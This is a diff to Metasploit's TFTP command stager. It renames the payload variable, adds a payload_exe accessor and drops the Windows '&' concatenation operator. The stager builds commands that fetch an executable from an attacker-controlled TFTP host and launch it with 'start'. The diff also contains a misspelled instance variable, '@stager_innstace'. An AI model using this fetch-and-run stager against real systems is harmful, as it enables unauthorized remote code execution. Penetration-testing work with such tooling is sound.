diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb index d2b4d4a7e0..fe346b93ed 100644 --- a/lib/msf/core/exploit/cmdstager.rb +++ b/lib/msf/core/exploit/cmdstager.rb @@ -22,6 +22,7 @@ module Exploit::CmdStager def initialize(info = {}) super @cmd_list = nil + @stager_innstace = nil end @@ -64,8 +65,8 @@ module Exploit::CmdStager @exe = generate_exe - stager_instance = create_stager(@exe) - cmd_list = stager_instance.generate(opts) + @stager_instance = create_stager(@exe) + cmd_list = @stager_instance.generate(opts) if (cmd_list.nil? or cmd_list.length < 1) print_error("The command stager could not be generated") diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb index 90ea8acd08..083f80b92e 100644 --- a/lib/msf/core/exploit/cmdstager_tftp.rb +++ b/lib/msf/core/exploit/cmdstager_tftp.rb @@ -58,6 +58,11 @@ module Exploit::CmdStagerTFTP def execute_cmdstager_end(opts) stop_service end + + def payload_exe + return nil if not @stager_instance + @stager_instance.payload_exe + end end diff --git a/lib/rex/exploitation/cmdstager/tftp.rb b/lib/rex/exploitation/cmdstager/tftp.rb index f15aaab7d4..d389d95e61 100644 --- a/lib/rex/exploitation/cmdstager/tftp.rb +++ b/lib/rex/exploitation/cmdstager/tftp.rb @@ -30,7 +30,7 @@ class CmdStagerTFTP < CmdStagerBase def initialize(exe) super - @var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe" + @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe" end @@ -40,10 +40,10 @@ class CmdStagerTFTP < CmdStagerBase # def compress_commands(cmds, opts) # Initiate the download - cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @var_payload_out}" + cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}" # Make it all happen - cmds << "start #{@tempdir + @var_payload_out}" + cmds << "start #{@tempdir + @payload_exe}" # Clean up after unless requested not to.. if (not opts[:nodelete]) @@ -53,11 +53,11 @@ class CmdStagerTFTP < CmdStagerBase super end - # Windows uses & to concat strings - def cmd_concat_operator - " & " - end + # NOTE: We don't use a concatenation operator here since we only have a couple commands. + # There really isn't any need to combine them. Also, the ms01_026 exploit depends on + # the start command being issued separately so that it can ignore it :) + attr_reader :payload_exe end end end